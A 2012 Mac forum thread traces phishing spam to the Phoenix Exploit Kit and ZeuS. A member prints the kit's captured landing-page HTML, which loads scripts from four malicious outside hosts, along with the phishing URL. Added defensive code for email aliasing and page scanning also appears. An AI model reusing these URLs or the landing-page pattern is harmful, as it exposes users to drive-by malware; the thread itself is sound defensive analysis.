FineTunedMac: an open community of Macintosh users, for Macintosh users.
anyone else getting Smith Micro spam?
#21059 03/13/12 04:01 PM
Joined: Aug 2009
OP Offline
I make new addresses for the different businesses I email to, so I can tell who is responsible for spam and phishing.

I started receiving phishing emails a few days ago to the address I created for emailing Smith Micro. I think they're the ones that bought out Stuffit? Anyone else getting these?

Both times in the past I've tried to call and complain about someone getting me on a spam/phish list (Ford and NewEgg most recently) they've denied the possibility of any involvement. (not surprising I suppose)

Last edited by cyn; 03/16/12 04:50 PM. Reason: Topic moved from the Lounge to the Networking forum.

I work for the Department of Redundancy Department
Re: anyone else getting Smith Micro spam?
Virtual1 #21082 03/15/12 05:09 PM
Joined: Aug 2009
Likes: 1
Offline
Generally speaking, if you start getting spam to an email address, there are a few possibilities:

- The spammers found it on a Web site, forum, or email group.
- The spammers found it by doing a dictionary attack.
- You used it on a Web site or online ordering system that was hacked.
- You gave it to someone who gave, sold, or rented it to the spammers.
- You gave it to someone who was then hacked.
- You gave it to someone who is infected with an email-scraping virus.

If this email was created only for Smith Micro, that rules out the first two possibilities, leaving only the bottom four. Smith Micro probably didn't intentionally sell it on to phishers, which means they have been hacked, they are using a computer infected with a virus, or the spammers found the email address by using a brute-force dictionary attack.

How unusual is the email address? Does it use dictionary words?


Photo gallery, all about me, and more: www.xeromag.com/franklin.html
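tacit's question is whether the alias is guessable. An added example of a per-vendor aliasing scheme that keeps the "who leaked it" property but resists dictionary attacks by binding a keyed HMAC tag to each vendor label. This is my code, not the scheme either poster uses; the secret, the domain example.net and the 8-hex-character tag length are assumptions for illustration.

```python
import hashlib
import hmac
import re

# Hypothetical values for this example, not Virtual1's "v1"+company@vftp.net scheme.
SECRET = b"rotate-me-per-mailbox"   # keep out of the address book and out of source control
DOMAIN = "example.net"
TAG_LEN = 8                         # hex characters kept from the HMAC (32 bits)


def normalize(vendor: str) -> str:
    """Reduce a vendor name to a stable lowercase label ("Smith Micro" -> "smithmicro")."""
    label = re.sub(r"[^a-z0-9]", "", vendor.lower())
    if not label:
        raise ValueError("vendor name has no usable characters")
    return label


def tag_for(label: str, secret: bytes = SECRET) -> str:
    """Keyed tag bound to the label; without the secret it cannot be predicted."""
    return hmac.new(secret, label.encode(), hashlib.sha256).hexdigest()[:TAG_LEN]


def make_alias(vendor: str, secret: bytes = SECRET, domain: str = DOMAIN) -> str:
    """Return <label>.<tag>@<domain> to hand to exactly one vendor.

    The label keeps the attribution property (you can read who leaked it); the
    tag defeats guessing: knowing one alias tells a spammer nothing about another,
    and a dictionary run over the domain has to hit 32 random bits per label.
    """
    label = normalize(vendor)
    return f"{label}.{tag_for(label, secret)}@{domain}"


def attribute(recipient: str, secret: bytes = SECRET, domain: str = DOMAIN):
    """Map an inbound recipient address back to the vendor label it was issued to.

    Returns None when the address is not in the alias format or its tag does not
    verify, i.e. it was guessed or forged rather than issued.  Anything that does
    verify but turns up in spam was leaked by, or stolen from, that vendor.
    """
    pattern = r"([a-z0-9]+)\.([0-9a-f]{%d})@%s" % (TAG_LEN, re.escape(domain))
    m = re.fullmatch(pattern, recipient.strip().lower())
    if not m:
        return None
    label, tag = m.groups()
    if not hmac.compare_digest(tag, tag_for(label, secret)):
        return None
    return label


if __name__ == "__main__":
    alias = make_alias("Smith Micro")
    print(alias)                                    # smithmicro.<8 hex chars>@example.net
    print(attribute(alias))                         # smithmicro
    print(attribute("smithmicro@example.net"))      # None: issued format requires a tag
```

Deliver the whole domain to one mailbox (catch-all) and run attribute() in the inbound filter: a verifying tag names the vendor to complain to, a non-verifying one is a guess and can be dropped outright.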
Re: anyone else getting Smith Micro spam?
tacit #21083 03/15/12 05:14 PM
Joined: Aug 2009
OP Offline
I typically use "v1" and the company name, @vftp.net as my alias. I obviously don't post it publicly. The prepending of "v1" to the start of the addresses makes them fairly resistant to dictionary attacks. I've checked my server logs a few times in the past looking for such mischief and other than the expected dictionary attempts I don't see much.

So I follow the same conclusion as you, hacked or botnetted. Either way probably a waste of my time to contact them, they're unlikely to admit to either.


I work for the Department of Redundancy Department
Re: anyone else getting Smith Micro spam?
tacit #21091 03/16/12 02:08 PM
Joined: Aug 2009
OP Offline
And I continue to get spam that looks like my "intuit order" is ready. Spam emails originate from Tunisia. The link tries to get me to go here:

http//livonya.com/BNCGCPNP/index.html
(attempting to autolink that url was not appreciated, ubb)

which does a really odd thing, it does a few redirects and ends me at microsoft.com. I assume it's doing some kind of a vulnerability test and determining their driveby download isn't going to work, and ditches me at microsoft?

Or maybe a cocktail? Curling that URL gives:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="http://africafe.hu/xyv9H9GN/js.js"></script>
<script type="text/javascript" src="http://asflexs.com/5w5txgvh/js.js"></script>
<script type="text/javascript" src="http://phreklam.com/zWNrFqKG/js.js"></script>
<script type="text/javascript" src="http://zizula.ro/RxTXmiNk/js.js"></script>

</html>


I work for the Department of Redundancy Department
Re: anyone else getting Smith Micro spam?
Virtual1 #21095 03/16/12 05:17 PM
Joined: Aug 2009
Likes: 1
Offline
It's the Phoenix Exploit Kit.

The Web site looks at the browser, platform, plugins, and other configuration information, then attempts a cocktail of browser, Java, Flash, and PDF exploits to download the W32/ZeuS malware. I've been seeing a lot of these lately.

W32/ZeuS is a modular, programmable, configurable malware strain that's sold in underground carder communities as a do-it-yourself kit. Once it infects a computer, it waits silently until a person attempts to visit a bank site or a site like PayPal. When that happens, it begins keystroke logging and then sends the person's login credentials to a server under the control of the person who set it up. It uses advanced encryption and other techniques to mask its communication with the server.

Antivirus software is almost 100% useless against ZeuS. Some antiviral programs can detect a handful of older variants; none that I know of can remove it.


Photo gallery, all about me, and more: www.xeromag.com/franklin.html
Re: anyone else getting Smith Micro spam?
tacit #21096 03/16/12 05:44 PM
Joined: Aug 2009
Likes: 1
Online
> Antivirus software is almost 100% useless against ZeuS.

But will Little Snitch attempt to protect people from being victimized by the exploit by reporting the "phone-home?"

Edit: I forgot to ask how it gets itself installed.

Edit 2: Google indicates that it's Windows only.

Last edited by artie505; 03/16/12 06:06 PM.

The new Great Equalizer is the SEND button.

In Memory of Harv: Those who can make you believe absurdities can make you commit atrocities. ~Voltaire
Re: anyone else getting Smith Micro spam?
Virtual1 #21097 03/16/12 06:14 PM
Joined: Aug 2009
Likes: 1
Online
> [...] it does a few redirects and ends me at microsoft.com. I assume it's doing some kind of a vulnerability test and determining their driveby download isn't going to work, and ditches me at microsoft?

After seeing that it's Windows only I entered the URL and was taken to what looks like a clothing sales site.

The home page displayed a log-in pane with name and password pre-entered, which I wasn't curious enough to click on.


The new Great Equalizer is the SEND button.

In Memory of Harv: Those who can make you believe absurdities can make you commit atrocities. ~Voltaire
Re: anyone else getting Smith Micro spam?
artie505 #21098 03/16/12 10:35 PM
Joined: Aug 2009
Likes: 1
Online
I forgot to mention in my last post that somewhere on the road to that shopping site I acquired a microsoft.com cookie. Curious?


The new Great Equalizer is the SEND button.

In Memory of Harv: Those who can make you believe absurdities can make you commit atrocities. ~Voltaire
Re: anyone else getting Smith Micro spam?
artie505 #21100 03/17/12 09:35 AM
Joined: Aug 2009
Likes: 1
Online
I'd label it curious. I just checked my cookies and, although I have various Microsoft sites I visit (due to needing support for my Office software), I do not have a cookie called microsoft.com.


ryck

iMac (Retina 5K, 27", 2017), 3.4 GHz Intel Core i5, 8GB RAM, 2400 MHz DDR4
OS Mojave 10.14.6
Canon MX710 Printer
Epson Perfection V500 Photo Scanner
Time Machine on 1TB LaCie USB-C
Carbon Copy Clone on 500GB OWC Mercury OTG Pro
Re: anyone else getting Smith Micro spam?
artie505 #21116 03/19/12 03:44 PM
Joined: Aug 2009
OP Offline
Originally Posted By: artie505
> Antivirus software is almost 100% useless against ZeuS.

But will Little Snitch attempt to protect people from being victimized by the exploit by reporting the "phone-home?"

Edit: I forgot to ask how it gets itself installed.

Edit 2: Google indicates that it's Windows only.


AFAIK all the exploits it is using and attempting to install are for windows. After trying to compromise your browser and failing, it dumps you off at some other web page.


I work for the Department of Redundancy Department
Re: anyone else getting Smith Micro spam?
tacit #21117 03/19/12 03:46 PM
Joined: Aug 2009
OP Offline
Originally Posted By: tacit
Antivirus software is almost 100% useless against ZeuS. Some antiviral programs can detect a handful of older variants; none that I know of can remove it.


Wow. I didn't know that. What do you do then? reformat and restore safe documents?


I work for the Department of Redundancy Department
Re: anyone else getting Smith Micro spam?
Virtual1 #21155 03/22/12 07:03 AM
Joined: Aug 2009
Likes: 1
Offline
Originally Posted By: Virtual1
AFAIK all the exploits it is using and attempting to install are for windows. After trying to compromise your browser and failing, it dumps you off at some other web page.


Yep. There are several exploit kits that are shopped around to malware writers to help them spread their malware, the two most common being the Blackhole Exploit Kit and the Phoenix Exploit Kit. Both can be configured to drop any malware (not just ZeuS) and both can be configured to send the user elsewhere if the exploits all fail or if the page is loaded in a way that the malware writer doesn't want.

For example, the Phoenix Exploit Kit is often configured in such a way that if you surf to it directly it'll redirect elsewhere; it attempts the exploit if it's loaded in an iFrame. The bad guys then compromise other sites and inject iFrames into them.

Originally Posted By: Virtual1
Wow. I didn't know that. What do you do then? reformat and restore safe documents?


Yep. Microsoft Security Essentials can remove some of the older variants of ZeuS, but for modern variants, or for some other similar malware? Yep, reformat and restore is Microsoft's recommended course of action.


Photo gallery, all about me, and more: www.xeromag.com/franklin.html
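Two things in this thread are worth checking by hand when you have a captured page in front of you: the landing page Virtual1 curled (a near-empty document pulling js.js from four unrelated hosts) and the delivery mechanism tacit describes (an iframe injected into a compromised site so the kit is loaded framed rather than visited directly). An added analysis example that covers both, written here as illustration rather than taken from the thread or from either exploit kit: it parses the captured landing-page HTML exactly as posted above, and a constructed snippet of a compromised shop page whose hostname shop.example.com is an assumption; the livonya.com URL in that snippet is the one given in the thread.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# The landing page as curled in the thread (copied verbatim from the post).
LANDING_PAGE = """<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="http://africafe.hu/xyv9H9GN/js.js"></script>
<script type="text/javascript" src="http://asflexs.com/5w5txgvh/js.js"></script>
<script type="text/javascript" src="http://phreklam.com/zWNrFqKG/js.js"></script>
<script type="text/javascript" src="http://zizula.ro/RxTXmiNk/js.js"></script>

</html>"""

# Constructed: what an injected iframe on a compromised shop page would look like.
COMPROMISED_PAGE = """<html><body>
<h1>Spring Collection</h1>
<img src="/img/coat.jpg">
<script src="/js/cart.js"></script>
<iframe src="http://livonya.com/BNCGCPNP/index.html" width="1" height="1" style="visibility:hidden"></iframe>
</body></html>"""


def _tiny(value) -> bool:
    """True for width/height attributes of 1px or less (e.g. "1", "0px")."""
    try:
        return int(str(value).rstrip("px")) <= 1
    except ValueError:
        return False


def iframe_reasons(attrs: dict, page_host) -> list:
    """Return the list of reasons an iframe looks injected; empty means unremarkable."""
    reasons = []
    host = urlparse(attrs.get("src", "")).hostname
    if host and host != page_host:
        reasons.append("third-party src")
    if _tiny(attrs.get("width")) or _tiny(attrs.get("height")):
        reasons.append("1px or smaller")
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        reasons.append("hidden by style")
    return reasons


class PageScanner(HTMLParser):
    """Collects off-host script sources and suspicious iframes from one HTML document."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.external_scripts = []
        self.suspicious_iframes = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            host = urlparse(a["src"]).hostname
            if host and host != self.page_host:
                self.external_scripts.append(a["src"])
        elif tag == "iframe":
            reasons = iframe_reasons(a, self.page_host)
            if reasons:
                self.suspicious_iframes.append((a.get("src", ""), reasons))


def scan(html: str, page_url: str) -> dict:
    """Scan a captured page (fetched with curl, never rendered) and report its loads."""
    scanner = PageScanner(urlparse(page_url).hostname)
    scanner.feed(html)
    scanner.close()
    return {
        "external_scripts": scanner.external_scripts,
        "script_hosts": sorted({urlparse(s).hostname for s in scanner.external_scripts}),
        "suspicious_iframes": scanner.suspicious_iframes,
    }


def looks_like_exploit_kit_landing(report: dict, min_hosts: int = 3) -> bool:
    """Heuristic from the captured page: scripts pulled from several unrelated hosts."""
    return len(report["script_hosts"]) >= min_hosts


if __name__ == "__main__":
    landing = scan(LANDING_PAGE, "http://livonya.com/BNCGCPNP/index.html")
    print("landing page script hosts:", landing["script_hosts"])
    print("exploit-kit pattern:", looks_like_exploit_kit_landing(landing))
    shop = scan(COMPROMISED_PAGE, "http://shop.example.com/")
    for src, why in shop["suspicious_iframes"]:
        print("suspicious iframe ->", src, "|", ", ".join(why))
```

Fetch with curl into a file and feed the file to scan(); the point of the thread is that merely loading the page in a browser is the exploit attempt, and the direct-visit redirect to an unrelated site is the kit declining to fire, not evidence that it is harmless.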
